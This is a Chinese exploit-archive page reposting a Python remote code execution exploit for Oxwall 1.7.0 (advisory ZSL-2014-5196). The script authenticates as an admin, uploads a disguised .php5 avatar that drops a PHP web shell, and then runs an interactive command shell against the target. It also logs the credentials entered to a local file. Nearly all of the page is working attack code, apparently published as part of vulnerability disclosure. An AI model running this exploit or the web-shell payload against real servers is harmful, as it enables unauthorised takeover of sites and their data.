首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Oxwall 1.7.0 - Remote Code Execution Exploit
来源:http://www.zeroscience.mk 作者:LiquidWorm 发布时间:2014-07-29  
#!/usr/bin/env python
#
#
# Oxwall 1.7.0 Remote Code Execution Exploit
#
#
# Vendor: Oxwall Software Foundation
# Product web page: http://www.oxwall.org
# Affected version: 1.7.0 (build 7907 and 7906)
#
# Summary: Oxwall is unbelievably flexible and easy to use PHP/MySQL
# social networking software platform.
#
# Desc: Oxwall suffers from an authenticated arbitrary PHP code
# execution. The vulnerability is caused due to the improper
# verification of uploaded files in '/admin/settings/user' script
# thru the 'avatar' and 'bigAvatar' POST parameters. This can be
# exploited to execute arbitrary PHP code by uploading a malicious
# PHP script file with '.php5' extension (to bypass the '.htaccess'
# block rule) that will be stored in '/ow_userfiles/plugins/base/avatars/'
# directory.
#
# Tested on: Kali Linux 3.7-trunk-686-pae
#            Apache/2.2.22 (Debian)
#            PHP 5.4.4-13(apache2handler)
#            MySQL 5.5.28
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# Zero Science Lab - http://www.zeroscience.mk
# Macedonian Information Security Research And Development Laboratory
#
#
# Advisory ID: ZSL-2014-5196
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5196.php
#
#
# 18.07.2014
#
#
  
version = '3.0.0.251'
  
import itertools, mimetools, mimetypes
import cookielib, urllib, urllib2, sys
import logging, os, time, datetime, re
  
from colorama import Fore, Back, Style, init
from cStringIO import StringIO
from urllib2 import URLError
  
init()
  
if os.name == 'posix': os.system('clear')
if os.name == 'nt': os.system('cls')
piton = os.path.basename(sys.argv[0])
  
def bannerche():
    print '''
 @---------------------------------------------------------------@
 |                                                               |
 |          Oxwall 1.7.0 Remote Code Execution Exploit           |
 |                                                               |
 |                                                               |
 |                       ID: ZSL-2014-5196                       |
 |                                                               |
 |              Copyleft (c) 2014, Zero Science Lab              |
 |                                                               |
 @---------------------------------------------------------------@
          '''
    if len(sys.argv) < 2:
        print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' <hostname>\n'
        print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk\n'
        sys.exit()
  
bannerche()
  
print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET
  
host = sys.argv[1]
  
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  
try:
    opener.open('http://'+host+'/sign-in?back-uri=admin')
except urllib2.HTTPError, errorzio:
    if errorzio.code == 404:
        print '\x20\x20[*] Checking path '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
        print '\x20\x20[*] '+Fore.YELLOW+'Check your path entry.'+Fore.RESET
        print
        sys.exit()
except URLError, errorziocvaj:
    if errorziocvaj.reason:
        print '\x20\x20[*] Checking host '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
        print '\x20\x20[*] '+Fore.YELLOW+'Check your hostname entry.'+Fore.RESET
        print
        sys.exit()
  
print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Login please.'
  
username = raw_input('\x20\x20[*] Enter username: ')
password = raw_input('\x20\x20[*] Enter password: ')
  
login_data = urllib.urlencode({
                            'form_name' : 'sign-in',
                            'identity' : username,
                            'password' : password,
                            'remember' : 'on',
                            'submit' : 'Sign In'
                            })
  
try:
    login = opener.open('http://'+host+'/sign-in?back-uri=admin', login_data)
    auth = login.read()
except urllib2.HTTPError, errorziotraj:
    if errorziotraj.code == 403:
        print '\x20\x20[*] '+Fore.RED+'Blocked by WAF.'+Fore.RESET
        print
        sys.exit()
  
for session in cj:
    sessid = session.name
  
print '\x20\x20[*] Mapping session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
cookie = ses_chk.group(0)
print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET
  
if re.search(r'Invalid username or email', auth):
    print '\x20\x20[*] Invalid username or email given '+'.'*23+Fore.RED+'[ER]'+Fore.RESET
    print
    sys.exit()
elif re.search(r'Invalid password', auth):
    print '\x20\x20[*] Invalid password '+'.'*38+Fore.RED+'[ER]'+Fore.RESET
    sys.exit()
else:
    print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET
  
  
class MultiPartForm(object):
  
    def __init__(self):
        self.form_fields = []
        self.files = []
        self.boundary = mimetools.choose_boundary()
        return
      
    def get_content_type(self):
        return 'multipart/form-data; boundary=%s' % self.boundary
  
    def add_field(self, name, value):
        self.form_fields.append((name, value))
        return
  
    def add_file(self, fieldname, filename, fileHandle, mimetype=None):
        body = fileHandle.read()
        if mimetype is None:
            mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
        self.files.append((fieldname, filename, mimetype, body))
        return
      
    def __str__(self):
  
        parts = []
        part_boundary = '--' + self.boundary
          
        parts.extend(
            [ part_boundary,
              'Content-Disposition: form-data; name="%s"' % name,
              '',
              value,
            ]
            for name, value in self.form_fields
            )
          
        parts.extend(
            [ part_boundary,
              'Content-Disposition: file; name="%s"; filename="%s"' % \
                 (field_name, filename),
              'Content-Type: %s' % content_type,
              '',
              body,
            ]
            for field_name, filename, content_type, body in self.files
            )
          
        flattened = list(itertools.chain(*parts))
        flattened.append('--' + self.boundary + '--')
        flattened.append('')
        return '\r\n'.join(flattened)
  
if __name__ == '__main__':
  
    form = MultiPartForm()
    form.add_field('form_name', 'userSettingsForm')
    form.add_field('displayName', 'realname')
    form.add_field('confirmEmail', 'on')
    form.add_field('avatarSize', '90')
    form.add_field('bigAvatarSize', '190')
    form.add_field('avatar', '')
    form.add_field('join_display_photo_upload', 'display')
    form.add_field('save', 'Save')
      
    form.add_file('bigAvatar', 'thricerbd.php5'
                  fileHandle=StringIO('<?php system(\'echo \"<?php echo \\"<pre>\\"; passthru(\$_GET[\\\'cmd\\\']); echo \\"</pre>\\"; ?>\" > liwo.php5\'); ?>'))
  
    request = urllib2.Request('http://'+host+'/admin/settings/user')
    request.add_header('User-agent', 'joxypoxy 3.0')
    body = str(form)
    request.add_header('Content-type', form.get_content_type())
    request.add_header('Cookie', cookie)
    request.add_header('Content-length', len(body))
    request.add_data(body)
    request.get_data()
    urllib2.urlopen(request).read()
    print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET
    checkfilename = urllib2.urlopen(request).read()
    filename = re.search('default_avatar_big_(\w+)', checkfilename).group(1)
    print '\x20\x20[*] Getting file name '+'.'*37+Fore.GREEN+'[OK]'+Fore.RESET
    print '\x20\x20[*] File name: '+Fore.YELLOW+'default_avatar_big_'+filename+'.php5'+Fore.RESET
  
opener.open('http://'+host+'/ow_userfiles/plugins/base/avatars/default_avatar_big_'+filename+'.php5')
print '\x20\x20[*] Persisting file liwo.php5 '+'.'*29+Fore.GREEN+'[OK]'+Fore.RESET
  
print '\x20\x20[*] Starting logging service '+'.'*30+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Spawning shell '+'.'*40+Fore.GREEN+'[OK]'+Fore.RESET
time.sleep(1)
  
furl = '/ow_userfiles/plugins/base/avatars/liwo.php5'
  
print
today = datetime.date.today()
fname = 'oxwall-'+today.strftime('%d-%b-%Y')+time.strftime('_%H%M%S')+'.log'
logging.basicConfig(filename=fname,level=logging.DEBUG)
  
logging.info(' '+'+'*75)
logging.info(' +')
logging.info(' + Log started: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S'))
logging.info(' + Title: Oxwall 1.7.0 Remote Code Execution Exploit')
logging.info(' + Python program executed: '+sys.argv[0])
logging.info(' + Version: '+version)
logging.info(' + Full query: \''+piton+'\x20'+host+'\'')
logging.info(' + Username input: '+username)
logging.info(' + Password input: '+password)
logging.info(' + Vector: '+'http://'+host+furl)
logging.info(' +')
logging.info(' + Advisory ID: ZSL-2014-5196')
logging.info(' + Zero Science Lab - http://www.zeroscience.mk')
logging.info(' +')
logging.info(' '+'+'*75+'\n')
  
print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET
raw_input()
while True:
    try:
        cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET)
        execute = opener.open('http://'+host+furl+'?cmd='+urllib.quote(cmd))
        reverse = execute.read()
        pattern = re.compile(r'<pre>(.*?)</pre>',re.S|re.M)
  
        print Style.BRIGHT+Fore.CYAN
        cmdout = pattern.match(reverse)
        print cmdout.groups()[0].strip()
        print Style.RESET_ALL+Fore.RESET
  
        if cmd.strip() == 'exit':
            break
  
        logging.info('Command executed: '+cmd+'\n\nOutput: \n'+'='*8+'\n\n'+cmdout.groups()[0].strip()+'\n\n'+'-'*60+'\n')
    except Exception:
        break
  
logging.warning('\n\nLog ended: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S')+'\n\nEND OF LOG')
print '\x20\x20[*] Carpe commentarius '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Log file: '+Fore.YELLOW+fname+Fore.RESET
print
  
sys.exit()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Pligg 2.0.1 - Multiple Vulnera
·SkaDate Lite 2.0 - Remote Code
·MQAC.sys Arbitrary Write Privi
·D-Link AP 3200 Multiple Vulner
·Make 3.81 - Heap Overflow PoC
·BulletProof FTP Client 2010 -
·Symantec Endpoint Protection 1
·Omeka 2.2.1 - Remote Code Exec
·Hitron Technologies CDE-30364
·Apache 2.4.x mod_proxy Denial
·SHARP MX Series - Denial of Se
·DjVuLibre <= 3.5.25.3 - Out of
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved